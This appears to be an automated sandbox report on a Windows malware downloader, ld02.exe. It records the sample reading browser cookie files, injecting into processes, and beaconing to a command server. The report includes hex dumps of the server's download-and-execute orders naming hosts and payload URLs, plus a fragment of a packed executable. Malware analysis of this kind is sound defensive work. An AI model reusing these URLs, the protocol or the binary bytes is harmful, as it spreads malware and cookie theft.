HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Environment	TEMP	%USERPROFILE%\Local Settings\Temp	6
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Environment	TMP	%USERPROFILE%\Local Settings\Temp	6
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	CertificateRevocation	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	DisableCachingOfSSLPages	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	EnableHttp1_1	1	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	EnableNegotiate	1	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	MimeExclusionListForCache	multipart/mixed multipart/x-mixed-replace multipart/x-byteranges	4
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	SecureProtocols	160	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	WarnOnPost	0x01000000	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	WarnOnZoneCrossing	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows NT\CurrentVersion\Winlogon	ParseAutoexec	1	3
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	Cache	C:\Documents and Settings\user\Local Settings\Temporary Internet Files	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders	AppData	%USERPROFILE%\Application Data	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders	Cache	%USERPROFILE%\Local Settings\Temporary Internet Files	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders	Cookies	%USERPROFILE%\Cookies	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders	History	%USERPROFILE%\Local Settings\History	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders	Local Settings	%USERPROFILE%\Local Settings	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders	Personal	%USERPROFILE%\My Documents	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache	Signature	Client UrlCache MMF Ver 5.2	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content	CacheLimit	163410	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content	CachePrefix		2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies	CacheLimit	8192	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies	CachePrefix	Cookie:	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012008051620080517	CacheLimit	8192	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012008051620080517	CacheOptions	11	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012008051620080517	CachePath	%USERPROFILE%\Local Settings\History\History.IE5\MSHist012008051620080517	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012008051620080517	CachePrefix	:2008051620080517:	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012008051620080517	CacheRepair	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData	CacheLimit	1000	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData	CacheOptions	8	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData	CachePath	%USERPROFILE%\UserData	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData	CachePrefix	UserData	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData	CacheRepair	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat	CacheLimit	8192	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat	CacheOptions	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat	CachePath	%USERPROFILE%\Local Settings\Application Data\Microsoft\Feeds Cache	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat	CachePrefix	feedplat:	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat	CacheRepair	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History	CacheLimit	8192	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History	CachePrefix	Visited:	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings	MigrateProxy	1	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings	ProxyEnable	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	DefaultConnectionSettings	0x3c0000000200000001000000000000000000000000000000040000000000	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	SavedLegacySettings	0x460000006700000001000000000000000000000000000000040000000000	4
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Volatile Environment	APPDATA	C:\Documents and Settings\user\Application Data	6
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Volatile Environment	CLIENTNAME		6
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Volatile Environment	HOMEDRIVE	C:	6
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Volatile Environment	HOMEPATH	\Documents and Settings\user	6
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Volatile Environment	HOMESHARE		6
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Volatile Environment	LOGONSERVER	\\USER	6
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Volatile Environment	SESSIONNAME	Console	6

	- Monitored Registry Keys:

Key Name	Watch subtree	Notify Filter	Count
HKLM\Software\Microsoft\Tracing\RASAPI32	0	Attributes Change,Value Change,Security Descriptor Change	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5	0	Key Change	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	0	Key Change	1

3.b) ld02.exe - File Activities

	- Files Created:

C:\DOCUME~1\user\LOCALS~1\Temp\jopaxx_1211198017.exe

C:\WINDOWS\tt_1211198016.exe

c:\windows\t55ft2950f44.dat

	- Files Read:

C:\Documents and Settings\user\Cookies\user@2o7[1].txt

C:\Documents and Settings\user\Cookies\user@ad.yieldmanager[2].txt

C:\Documents and Settings\user\Cookies\user@adobe[1].txt

C:\Documents and Settings\user\Cookies\user@adopt.euroclick[1].txt

C:\Documents and Settings\user\Cookies\user@adopt.specificclick[1].txt

C:\Documents and Settings\user\Cookies\user@adrevolver[2].txt

C:\Documents and Settings\user\Cookies\user@ads.revsci[1].txt

C:\Documents and Settings\user\Cookies\user@advertising[2].txt

C:\Documents and Settings\user\Cookies\user@amazon[2].txt

C:\Documents and Settings\user\Cookies\user@apmebf[2].txt

C:\Documents and Settings\user\Cookies\user@ar.voicefive[1].txt

C:\Documents and Settings\user\Cookies\user@atdmt[2].txt

C:\Documents and Settings\user\Cookies\user@atwola[1].txt

C:\Documents and Settings\user\Cookies\user@burstnet[1].txt

C:\Documents and Settings\user\Cookies\user@c.msn[2].txt

C:\Documents and Settings\user\Cookies\user@c1.microsoft[1].txt

C:\Documents and Settings\user\Cookies\user@casalemedia[2].txt

C:\Documents and Settings\user\Cookies\user@com[1].txt

C:\Documents and Settings\user\Cookies\user@contextweb[1].txt

C:\Documents and Settings\user\Cookies\user@doubleclick[1].txt

C:\Documents and Settings\user\Cookies\user@download[2].txt

C:\Documents and Settings\user\Cookies\user@ehg-verizon.hitbox[2].txt

C:\Documents and Settings\user\Cookies\user@fastclick[2].txt

C:\Documents and Settings\user\Cookies\user@google[1].txt

C:\Documents and Settings\user\Cookies\user@google[2].txt

C:\Documents and Settings\user\Cookies\user@hitbox[2].txt

C:\Documents and Settings\user\Cookies\user@icq[1].txt

C:\Documents and Settings\user\Cookies\user@iseclab[1].txt

C:\Documents and Settings\user\Cookies\user@live365[1].txt

C:\Documents and Settings\user\Cookies\user@live[1].txt

C:\Documents and Settings\user\Cookies\user@m.webtrends[2].txt

C:\Documents and Settings\user\Cookies\user@media.adrevolver[1].txt

C:\Documents and Settings\user\Cookies\user@mediaplex[1].txt

C:\Documents and Settings\user\Cookies\user@microsoft[2].txt

C:\Documents and Settings\user\Cookies\user@microsoftwga.112.2o7[1].txt

C:\Documents and Settings\user\Cookies\user@msn[1].txt

C:\Documents and Settings\user\Cookies\user@msnportal.112.2o7[1].txt

C:\Documents and Settings\user\Cookies\user@news[1].txt

C:\Documents and Settings\user\Cookies\user@onlinestores.metaservices.microsoft[1].txt

C:\Documents and Settings\user\Cookies\user@planetpdf[1].txt

C:\Documents and Settings\user\Cookies\user@questionmarket[2].txt

C:\Documents and Settings\user\Cookies\user@rad.msn[2].txt

C:\Documents and Settings\user\Cookies\user@realmedia[1].txt

C:\Documents and Settings\user\Cookies\user@revsci[2].txt

C:\Documents and Settings\user\Cookies\user@search.live[2].txt

C:\Documents and Settings\user\Cookies\user@search.microsoft[1].txt

C:\Documents and Settings\user\Cookies\user@support.microsoft[1].txt

C:\Documents and Settings\user\Cookies\user@symantec[2].txt

C:\Documents and Settings\user\Cookies\user@tacoda[1].txt

C:\Documents and Settings\user\Cookies\user@tribalfusion[1].txt

C:\Documents and Settings\user\Cookies\user@update.microsoft[1].txt

C:\Documents and Settings\user\Cookies\user@verizon[1].txt

C:\Documents and Settings\user\Cookies\user@voicefive[1].txt

C:\Documents and Settings\user\Cookies\user@westernunion[2].txt

C:\Documents and Settings\user\Cookies\user@www.microsoft[2].txt

C:\Documents and Settings\user\Cookies\user@www.msn[2].txt

C:\Documents and Settings\user\Cookies\user@www22.verizon[1].txt

C:\Documents and Settings\user\Cookies\user@zedo[1].txt

PIPE\lsarpc

c:\autoexec.bat

	- Files Modified:

C:\DOCUME~1\user\LOCALS~1\Temp\jopaxx_1211198017.exe

C:\WINDOWS\tt_1211198016.exe

PIPE\lsarpc

WMIDataDevice

\Device\Afd\Endpoint

\Device\RasAcd

c:\windows\t55ft2950f44.dat

	- File System Control Communication:

File	Control Code	Times
PIPE\lsarpc	0x0011C017	22

	- Device Control Communication:

File	Control Code	Times
unnamed file	0x00390008	7
WMIDataDevice	0x0022414C	2
WMIDataDevice	0x00228144	2
\Device\RasAcd	0x00F14014	5
\Device\Afd\Endpoint	AFD_GET_INFO (0x0001207B)	2
\Device\Afd\Endpoint	AFD_SET_CONTEXT (0x00012047)	15
\Device\Afd\Endpoint	AFD_BIND (0x00012003)	5
\Device\Afd\Endpoint	AFD_GET_TDI_HANDLES (0x00012037)	10
\Device\Afd\Endpoint	AFD_CONNECT (0x00012007)	5
\Device\Afd\Endpoint	AFD_SEND (0x0001201F)	6
\Device\Afd\Endpoint	AFD_RECV (0x00012017)	42

	- Memory Mapped Files:

File Name

C:\DOCUME~1\user\LOCALS~1\Temp\jopaxx_1211198017.exe

C:\WINDOWS\System32\mswsock.dll

C:\WINDOWS\System32\winrnr.dll

C:\WINDOWS\System32\wshtcpip.dll

C:\WINDOWS\system32\Apphelp.dll

C:\WINDOWS\system32\DNSAPI.dll

C:\WINDOWS\system32\MSCTF.dll

C:\WINDOWS\system32\RASAPI32.dll

C:\WINDOWS\system32\TAPI32.dll

C:\WINDOWS\system32\WINMM.dll

C:\WINDOWS\system32\hnetcfg.dll

C:\WINDOWS\system32\rasadhlp.dll

C:\WINDOWS\system32\rasman.dll

C:\WINDOWS\system32\rpcss.dll

C:\WINDOWS\system32\rtutils.dll

C:\WINDOWS\system32\sensapi.dll

C:\WINDOWS\tt_1211198016.exe

C:\Windows\AppPatch\sysmain.sdb

3.c) ld02.exe - Windows Service Activities

	- Services Started:

RASMAN

3.d) ld02.exe - Process Activities

	- Processes Created:

Executable	Command Line
C:\WINDOWS\tt_1211198016.exe
	C:\WINDOWS\tt_1211198016.exe
C:\DOCUME~1\user\LOCALS~1\Temp\jopaxx_1211198017.exe
	C:\DOCUME~1\user\LOCALS~1\Temp\\jopaxx_1211198017.exe

	- Remote Threads Created:

Affected Process

C:\WINDOWS\tt_1211198016.exe

C:\DOCUME~1\user\LOCALS~1\Temp\jopaxx_1211198017.exe

	- Thread Overview:

Time	Number of threads
After 129 seconds	1

	- Foreign Memory Regions Read:

Process: C:\DOCUME~1\user\LOCALS~1\Temp\jopaxx_1211198017.exe

Process: C:\WINDOWS\tt_1211198016.exe

	- Foreign Memory Regions Written:

Process: C:\DOCUME~1\user\LOCALS~1\Temp\jopaxx_1211198017.exe

Process: C:\WINDOWS\tt_1211198016.exe

3.e) ld02.exe - Network Activity

	- DNS Queries:

Name	Query Type	Query Result	Successful	Protocol
www.google.com	DNS_TYPE_A		1
onames0603.com	DNS_TYPE_A	58.241.255.37	1
aksajans.com	DNS_TYPE_A	212.58.23.82	1

	- HTTP Conversations:

From ANUBIS:1032 to 74.125.43.104:80 - [www.google.com]
Request: GET /
Response: 302 "Found"
From ANUBIS:1033 to 58.241.255.37:80 - [onames0603.com]
Request: POST /achcheck.php
Response: 200 "OK"
Request: POST /ld/gen.php
Response: 200 "OK"
From ANUBIS:1035 to 212.58.23.82:80 - [aksajans.com]
Request: GET /gif/nfr.exe
Response: 200 "OK"
Request: GET /gif/pp.03.exe
Response: 200 "OK"

	- Unknown TCP Traffic:

from ANUBIS:1034 to 58.241.255.37:80

State: Normal establishment and termination - Transferred outbound Bytes: 381 - Transferred inbound Bytes: 288

Data sent:

    
504f 5354 202f 6c64 2f67 656e 2e70 6870    POST /ld/gen.php
2048 5454 502f 312e 310d 0a48 6f73 743a     HTTP/1.1..Host:
206f 6e61 6d65 7330 3630 332e 636f 6d0d     onames0603.com.
0a55 7365 722d 4167 656e 743a 204d 6f7a    .User-Agent: Moz
696c 6c61 2f34 2e30 2028 636f 6d70 6174    illa/4.0 (compat
6962 6c65 3b20 4d53 4945 2037 2e30 3b20    ible; MSIE 7.0; 
5769 6e64 6f77 7320 4e54 2035 2e31 3b20    Windows NT 5.1; 
2e4e 4554 2043 4c52 2032 2e30 2e35 3037    .NET CLR 2.0.507
3237 3b20 2e4e 4554 2043 4c52 2033 2e30    27; .NET CLR 3.0
2e34 3530 362e 3231 3532 3b20 2e4e 4554    .4506.2152; .NET
2043 4c52 2033 2e35 2e33 3037 3239 290d     CLR 3.5.30729).
0a43 6f6e 7465 6e74 2d74 7970 653a 2061    .Content-type: a
7070 6c69 6361 7469 6f6e 2f78 2d77 7777    pplication/x-www
2d66 6f72 6d2d 7572 6c65 6e63 6f64 6564    -form-urlencoded
0d0a 436f 6e6e 6563 7469 6f6e 3a20 636c    ..Connection: cl
6f73 650d 0a43 6f6e 7465 6e74 2d4c 656e    ose..Content-Len
6774 683a 2031 3133 0d0a 0d0a              gth: 113....

Data sent:

    
663d 3026 613d 3138 3234 3234 3530 3030    f=0&a=1824245000
2676 3d30 3226 633d 3026 733d 6c64 266c    &v=02&c=0&s=ld&l
3d31 3032 3730 2663 6b3d 3026 635f 6662    =10270&ck=0&c_fb
3d30 2663 5f6d 733d 3026 635f 6869 3d30    =0&c_ms=0&c_hi=0
2663 5f62 653d 3026 635f 6672 3d30 2663    &c_be=0&c_fr=0&c
5f79 623d 3026 635f 7467 3d30 2663 5f6e    _yb=0&c_tg=0&c_n
6c3d 3026 635f 6675 3d30 2663 5f6c 6a3d    l=0&c_fu=0&c_lj=
30                                         0

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2057 6564 2c20 3138 204d    .Date: Wed, 18 M
6172 2032 3030 3920 3231 3a32 323a 3339    ar 2009 21:22:39
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e33 2028 4365 6e74    ache/2.2.3 (Cent
4f53 290d 0a58 2d50 6f77 6572 6564 2d42    OS)..X-Powered-B
793a 2050 4850 2f35 2e31 2e36 0d0a 436f    y: PHP/5.1.6..Co
6e74 656e 742d 4c65 6e67 7468 3a20 3131    ntent-Length: 11
310d 0a43 6f6e 6e65 6374 696f 6e3a 2063    1..Connection: c
6c6f 7365 0d0a 436f 6e74 656e 742d 5479    lose..Content-Ty
7065 3a20 7465 7874 2f68 746d 6c0d 0a0d    pe: text/html...
0a23 5049 443d 3830 3031 0a53 5441 5254    .#PID=8001.START
7c68 7474 703a 2f2f 616b 7361 6a61 6e73    |http://aksajans
2e63 6f6d 2f67 6966 2f6e 6672 2e65 7865    .com/gif/nfr.exe
0a53 5441 5254 4f4e 4345 7c68 7474 703a    .STARTONCE|http:
2f2f 616b 7361 6a61 6e73 2e63 6f6d 2f67    //aksajans.com/g
6966 2f70 702e 3033 2e65 7865 0a23 424c    if/pp.03.exe.#BL
4143 4b4c 4142 454c 0d0a 4558 4954 0d0a

from ANUBIS:1037 to 212.58.23.82:80

State: Normal establishment and termination - Transferred outbound Bytes: 247 - Transferred inbound Bytes: 12028

Data sent:

    
4745 5420 2f67 6966 2f70 702e 3033 2e65    GET /gif/pp.03.e
7865 2048 5454 502f 312e 310d 0a48 6f73    xe HTTP/1.1..Hos
743a 2061 6b73 616a 616e 732e 636f 6d0d    t: aksajans.com.
0a55 7365 722d 4167 656e 743a 204d 6f7a    .User-Agent: Moz
696c 6c61 2f34 2e30 2028 636f 6d70 6174    illa/4.0 (compat
6962 6c65 3b20 4d53 4945 2037 2e30 3b20    ible; MSIE 7.0; 
5769 6e64 6f77 7320 4e54 2035 2e31 3b20    Windows NT 5.1; 
2e4e 4554 2043 4c52 2032 2e30 2e35 3037    .NET CLR 2.0.507
3237 3b20 2e4e 4554 2043 4c52 2033 2e30    27; .NET CLR 3.0
2e34 3530 362e 3231 3532 3b20 2e4e 4554    .4506.2152; .NET
2043 4c52 2033 2e35 2e33 3037 3239 290d     CLR 3.5.30729).
0a43 6f6e 7465 6e74 2d74 7970 653a 2061    .Content-type: a
7070 6c69 6361 7469 6f6e 2f78 2d77 7777    pplication/x-www
2d66 6f72 6d2d 7572 6c65 6e63 6f64 6564    -form-urlencoded
0d0a 436f 6e6e 6563 7469 6f6e 3a20 636c    ..Connection: cl
6f73 650d 0a0d 0a                          ose....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2057 6564 2c20 3138 204d    .Date: Wed, 18 M
6172 2032 3030 3920 3231 3a33 393a 3530    ar 2009 21:39:50
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 0d0a 4c61 7374 2d4d 6f64 6966    ache..Last-Modif
6965 643a 2057 6564 2c20 3138 204d 6172    ied: Wed, 18 Mar
2032 3030 3920 3136 3a34 343a 3131 2047     2009 16:44:11 G
4d54 0d0a 4554 6167 3a20 2233 3161 3162    MT..ETag: "31a1b
652d 3265 3030 2d36 3439 6561 6363 3022    e-2e00-649eacc0"
0d0a 4163 6365 7074 2d52 616e 6765 733a    ..Accept-Ranges:
2062 7974 6573 0d0a 436f 6e74 656e 742d     bytes..Content-
4c65 6e67 7468 3a20 3131 3737 360d 0a43    Length: 11776..C
6f6e 6e65 6374 696f 6e3a 2063 6c6f 7365    onnection: close
0d0a 436f 6e74 656e 742d 5479 7065 3a20    ..Content-Type: 
6170 706c 6963 6174 696f 6e2f 6f63 7465    application/octe
742d 7374 7265 616d 0d0a 0d0a 4d5a 9000    t-stream....MZ..
0300 0000 0400 0000 ffff 0000 b800 0000    ................
0000 0000 4000 0000 0000 0000 0000 0000    ....@...........
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0001 0000 0e1f ba0e    ................
00b4 09cd 21b8 014c cd21 5468 6973 2070    ....!..L.!This p
726f 6772 616d 2063 616e 6e6f 7420 6265    rogram cannot be
2072 756e 2069 6e20 444f 5320 6d6f 6465     run in DOS mode
2e0d 0d0a 2400 0000 0000 0000 c866 98ff    ....$........f..
8c07 f6ac 8c07 f6ac 8c07 f6ac f71b faac    ................
8807 f6ac 0f1b f8ac 8e07 f6ac e318 fcac    ................
8707 f6ac e318 fdac 8e07 f6ac e318 f2ac    ................
8807 f6ac 8c07 f6ac 8707 f6ac da18 e5ac    ................
8b07 f6ac ee18 e5ac 8107 f6ac 8c07 f7ac    ................
f507 f6ac ba21 fdac 8107 f6ac 5269 6368    .....!......Rich
8c07 f6ac 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 5045 0000    ............PE..
4c01 0300 b726 be49 0000 0000 0000 0000    L....&.I........
e000 0f01 0b01 0600 0030 0000 0010 0000    .........0......
0040 0000 e072 0000 0050 0000 0080 0000    .@...r...P......
0000 4000 0010 0000 0002 0000 0400 0000    ..@.............
0000 0000 0400 0000 0000 0000 0090 0000    ................
0010 0000 0000 0000 0200 0000 0000 1000    ................
0010 0000 0000 1000 0010 0000 0000 0000    ................
1000 0000 0000 0000 0000 0000 0080 0000    ................
a802 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 5550 5830 0000 0000 0040 0000    ....UPX0.....@..
0010 0000 0000 0000 0004 0000 0000 0000    ................
0000 0000 0000 0000 8000 00e0 5550 5831    ............UPX1
0000 0000 0030 0000 0050 0000 0026 0000    .....0...P...&..
0004 0000 0000 0000 0000 0000 0000 0000    ................
4000 00e0 5550 5832 0000 0000 0010 0000    @...UPX2........
0080 0000 0004 0000 002a 0000 0000 0000    .........*......
0000 0000 0000 0000 4000 00c0 0000 0000    ........@.......
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0033 2e30 3300 5550 5821    .......3.03.UPX!
0d09 0208 45e5 76ed b346 2052 0359 0000    ....E.v..F R.Y..
dc22 0000 0060 0000 2601 0017 eddd ffff    ."...`..&.......
558b ec81 ecd0 0d00 0056 5768 bc50 4000    U........VWh.P@.
68a8 04ff 1564 4105 7dbb b7ff 83c4 0885    h....dA.}.......
c00f 857a 011c 8b35 6010 68a0 2098 fb37    ...z...5`.h. ..7
cff3 048c 8480 8d85 30f2 ffff 6864 0aef    ........0...hd..
eb7e bb50 ffd6 371c 8d8d 18f6 1054 204c    .~.P..7......T L
04e7 a77b 9e44 4028 2451 188d 957f db6c    ...{.D@($Q.....l
dd52 685f 8071 94b9 ff0a 0033 c08d bd00    .Rh_.q.....3....
fbb5 6fbb fc3d 0002 0cf3 ab66 ab5d 0e50    ..o..=.....f.].P
6a96 8f6c 5fb7 7c40 6c8d 0e51 a35c 0483    j..l_.|@l..Q.\..
f805 fb7f ed03 766e 4b14 85d2 7504 33f6    ......vnK...u.3.
eb3b 31df fedb b32f 807c 488b c783 c003    .;1..../.|H.....
24fc e86a                                  $..j

Data received:

    
682a 135f 705c f241 2c8b 4685 57e8 0b20    h*._p\.A,.F.W.. 
74c1 7467 a885 7aba 3574 178b 7be2 061d    t.tg..z.5t..{...
5310 b3c8 542c 101c 64e4 d6de 4e1e 3fd6    S...T,..d...N.?.
000c 6abb 1465 0cff 2c02 4024 57a4 ad39    ..j..e..,.@$W..9
7f60 1f9f b40b 5704 abd5 5521 9afd f196    .`....W...U!....
e26c 68cc 0cf8 331c 4c6a 74f5 28de e0dc    .lh...3.Ljt.(...
046b cd40 8f8e a957 5f1f 24da ce1d f83b    .k.@...W_.$....;
eb5d 5675 1953 2124 0158 886d df10 bb39    .]Vu.S!$.X.m...9
887e 2411 3bb8 c84d da80 7a15 27c1 142f    .~$.;..M..z.'../
2c39 b001 5bd2 497b 860c 3071 d352 a677    ,9..[.I{..0q.R.w
58b2 d854 40dd c358 b0f6 6685 c940 15ef    X..T@..X..f..@..
5800 7c0b dd2b 0108 5015 1c0c 5625 ecd9    X.|..+..P...V%..
566f 01dc 3b04 73e2 5495 6b30 c076 cad0    Vo..;.s.T.k0.v..
344b a818 566c 3980 4ff2 5266 a89f 640d    4K..Vl9.O.Rf..d.
2be4 e86b 303f ab64 d434 3e74 c36f 77d2    +..k0?.d.4>t.ow.
c806 5b38 4575 c009 5de8 5d39 08e1 2e03    ..[8Eu..].]9....
c650 6ad0 0d26 3db7 2129 85db 0c1d 58a8    .Pj..&=.!)....X.
f75c b86e 6185 6d07 0591 0f8b 7517 c858    .\.na.m.....u..X
e65c 42e8 d18b fbda c48e 41db c09c fbc9    .\B.......A.....
8d3c 181c fb1e 9d04 12df a186 43c3 4d26    .<..........C.M&
8d5f 9781 05ef d400 9054 6135 42cb ba1f    ._.......Ta5B...
78ad cf53 ed76 9b3d 2057 17b5 7d08 4b07    x..S.v.= W..}.K.
0aa4 0605 f8da 4708 880a 08fa f619 9c30    ......G........0
3433 28d1 b50c 3468 4acf dcfb 414b b2e0    43(...4hJ...AK..
0049 2603 3f03 7691 6d53 557c 4e75 10ac    .I&.?.v.mSU|Nu..
167f 656c 0c5c c7f1 8d65 f4aa 3db5 84a6    ..el.\...e..=...
2e5d 8edf 5632 eacd 818a 0646 085e c32f    .]..V2.....F.^./
8f82 016e e860 5d70 4332 e004 5565 1542    ...n.`]pC2..Ue.B
73c0 638b fae6 6924 1d5c 99ec 2e2e bf1c    s.c...i$.\......
5525 d911 841b 08d1 250f 3197 8592 230c    U%......%.1...#.
1855 2b10 6c24 0321 0883 7c23 215e 1f68    .U+.l$.!..|#!^.h
af00 4bf2 0b81 2bf8 5457 2b90 57d8 dbf0    ..K...+.TW+.W...
5474 cfa5 b2e8 2b27 2e2b e059 2c60 9494    Tt....+'.+.Y,`..
325b 6e83 ce44 8c10 114e 84d9 ec73 6319    2[n..D...N...sc.
510f 0752 2917 3596 0f5c 504e 248c 2030    Q..R).5..\PN$. 0
4c1e e452 0fe8 0388 9b04 1518 a204 d517    L..R............
